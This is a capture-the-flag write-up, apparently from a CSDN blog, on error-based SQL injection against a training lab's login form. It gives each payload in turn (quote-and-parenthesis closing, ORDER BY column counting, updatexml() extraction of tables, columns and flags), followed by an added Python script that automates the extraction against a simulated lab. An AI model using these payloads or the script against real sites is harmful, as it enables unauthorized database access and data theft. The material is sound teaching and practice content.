Log in directly with username zkz and password zkz: the page displays normally.
Then enter
zkz
zkz' and 666=666 #
The page displays abnormally, so a single quote on its own does not close the original expression.
So try closing a parenthesis as well; enter
zkz
zkz') and 666=666 #
It displays successfully: the password is enclosed as ('...') in the query, so every payload below starts with ') and ends with # to comment out the rest.
Now guess the number of columns; enter
zkz
zkz') and 666=666 order by 5 #
Error. Keep lowering the ORDER BY value and retrying; the column count turns out to be 2.
Next, a UNION query to look for an echo point; enter
zkz
zkz') and 666=888 union all select 1,2 #
There is no echo point (the page only shows whether the login succeeded and never prints anything from the selected columns), which is a bit puzzling at first.
So try the updatexml() error-based function instead; enter
zkz
zkz') and updatexml(1,concat(0x7e,(select database()),0x7e),3) #
The error message leaks the database name: security. updatexml() aborts on the malformed XPath and echoes it back; 0x7e is '~' and marks the boundaries of the extracted value. The echoed text is capped at 32 characters, which is enough for every value in this lab.
Next the table names; enter
zkz
zkz') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),3) #
Table name: emails.
Keep stepping the LIMIT offset (limit 1,1, limit 2,1, ...) and the remaining tables come out: referers, uagents, users, zkaq.
Then the column names; enter
zkz
zkz') and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='zkaq' limit 0,1),0x7e),3) #
Column: flag. Stepping the offset gives the second column: zKaQ.
Now the contents; enter
zkz
zkz') and updatexml(1,concat(0x7e,(select flag from zkaq limit 0,1),0x7e),3) #
This returns 1, and the next row returns 2. The flag is evidently not in this column, so query the other one; enter
zkz
zkz') and updatexml(1,concat(0x7e,(select zKaQ from zkaq limit 0,1),0x7e),3) #
Result:
zKaQ-ErR0rBaS4d
Continue stepping the offset and the rest come out:
zKaQ-ErrOrSqLInJ4ct1ons
zKaQ-Tw1st
zKaQ-D0ub1eQuot4s
zKaQ-B1indB7s4d
zKaQ-SqLInJectOnE
zKaQ-W1dech4rSQL
zKaQ-adds1ash4s
zKaQ-Slash4sSQl
zKaQ-D4la7Bas4d
zKaQ-T1m4B3s4d
zKaQ-T1m4Ba3edTh2ee
zKaQ-HtTpH4ader
zKaQ-HtTpR4FeRer
zKaQ-HtTpCo0kie
zKaQ-P0stErr0rB4sed
zKaQ-P0stD0ubl4
zKaQ-HacKTw1st
Then submit them one by one as the answer. The flag turns out to be zKaQ-HacKTw1st.
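The whole procedure above, automated, as an added example that is not code from the original post. FakeLab is a constructed stand-in for the lab's login page: it runs the inferred query (password enclosed in ('...')) on SQLite and emulates the MySQL pieces the post relies on (updatexml() aborting with "XPATH syntax error: '...'" truncated to 32 characters, # line comments, 0x7e as '~', database() and information_schema); all of its seed data, including one deliberately long value, is made up. Unlike the post's payloads, the extractor wraps the subquery in substr() and pages through it 31 characters at a time, so it also recovers values wider than the 32-character error window, and it walks LIMIT offsets until the subquery returns NULL instead of guessing when to stop.

```python
"""Error-based (updatexml) extraction against the login form above.
Added example; FakeLab is a constructed SQLite-backed stand-in for the lab."""
import re
import sqlite3

XPATH_ERR = re.compile(r"XPATH syntax error: '~([^']*)'")
CHUNK = 31  # updatexml echoes at most 32 chars; one of them is the '~' marker
LONG_FLAG = "zKaQ-a-value-wider-than-the-32-char-updatexml-window"  # constructed


class FakeLab:
    """Emulated login page: the password lands inside ('...') in the query."""

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("ATTACH ':memory:' AS information_schema")
        self.db.executescript(f"""
            CREATE TABLE users(username TEXT, password TEXT);
            INSERT INTO users VALUES ('zkz', 'zkz');
            CREATE TABLE zkaq(flag TEXT, zKaQ TEXT);
            INSERT INTO zkaq VALUES ('1', 'zKaQ-ErR0rBaS4d'), ('2', 'zKaQ-HacKTw1st'),
                                    ('3', '{LONG_FLAG}');
            CREATE TABLE information_schema.tables(table_schema TEXT, table_name TEXT);
            INSERT INTO information_schema.tables VALUES ('security', 'emails'),
                ('security', 'referers'), ('security', 'uagents'),
                ('security', 'users'), ('security', 'zkaq');
            CREATE TABLE information_schema.columns(table_schema TEXT, table_name TEXT,
                                                    column_name TEXT);
            INSERT INTO information_schema.columns VALUES ('security', 'zkaq', 'flag'),
                                                          ('security', 'zkaq', 'zKaQ');
        """)
        self._xpath_errors = []
        self.db.create_function("database", 0, lambda: "security")
        # MySQL CONCAT yields NULL as soon as one argument is NULL
        self.db.create_function("concat", -1,
                                lambda *a: None if None in a else "".join(map(str, a)))
        self.db.create_function("updatexml", 3, self._updatexml)

    def _updatexml(self, target, xpath, new_xml):
        # A malformed XPath ('~...' never parses) aborts the MySQL statement and
        # the error echoes at most 32 characters of it; a NULL XPath raises nothing.
        if xpath is not None:
            self._xpath_errors.append(f"XPATH syntax error: '{str(xpath)[:32]}'")
        return None

    def login(self, username, password):
        """Page text: 'login ok', 'login failed' or 'error: ...' (no echo point)."""
        self._xpath_errors.clear()
        sql = ("SELECT username, password FROM users "
               f"WHERE username='{username}' AND password=('{password}')")
        sql = sql.split("#", 1)[0]        # MySQL '#' line comment; SQLite has none
        sql = sql.replace("0x7e", "'~'")  # MySQL hex string literal; SQLite reads 126
        try:
            row = self.db.execute(sql).fetchone()
        except sqlite3.Error as exc:
            return f"error: {exc}"
        if self._xpath_errors:
            return f"error: {self._xpath_errors[0]}"
        return "login ok" if row else "login failed"


def extract_value(send, expr):
    """Read one scalar SQL expression through the error page, CHUNK chars at a
    time, so values longer than the 32-char window come back whole.
    Returns None when no XPATH error appears, i.e. the expression was NULL."""
    value, start = "", 1
    while True:
        payload = (f"zkz') and updatexml(1,concat(0x7e,"
                   f"substr(({expr}),{start},{CHUNK})),3) #")
        match = XPATH_ERR.search(send("zkz", payload))
        if match is None:
            return value or None
        piece = match.group(1)
        value += piece
        if len(piece) < CHUNK:
            return value
        start += CHUNK


def dump_rows(send, select_sql):
    """Walk a single-column SELECT with LIMIT n,1 until it returns NULL."""
    rows = []
    while True:
        value = extract_value(send, f"{select_sql} limit {len(rows)},1")
        if value is None:
            return rows
        rows.append(value)


def enumerate_lab(send):
    """The post's sequence: database, tables, columns of zkaq, values of zkaq.zKaQ."""
    return {
        "database": extract_value(send, "select database()"),
        "tables": dump_rows(send, "select table_name from information_schema.tables "
                                  "where table_schema=database()"),
        "zkaq_columns": dump_rows(send, "select column_name from information_schema.columns"
                                        " where table_schema=database() and table_name='zkaq'"),
        "zkaq_values": dump_rows(send, "select zKaQ from zkaq"),
    }


if __name__ == "__main__":
    lab = FakeLab()
    for pw in ["zkz", "zkz' and 666=666 #", "zkz') and 666=666 #"]:
        print(repr(pw), "->", lab.login("zkz", pw))
    print(enumerate_lab(lab.login))
```

To use it against the real lab, replace FakeLab.login with a function that POSTs the two fields and returns the response body; extract_value and dump_rows only depend on that send(username, password) signature.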
Source: CSDN
Author: 吃遍全国海底捞
Link: https://blog.csdn.net/NiFeng_ShouHu/article/details/104100477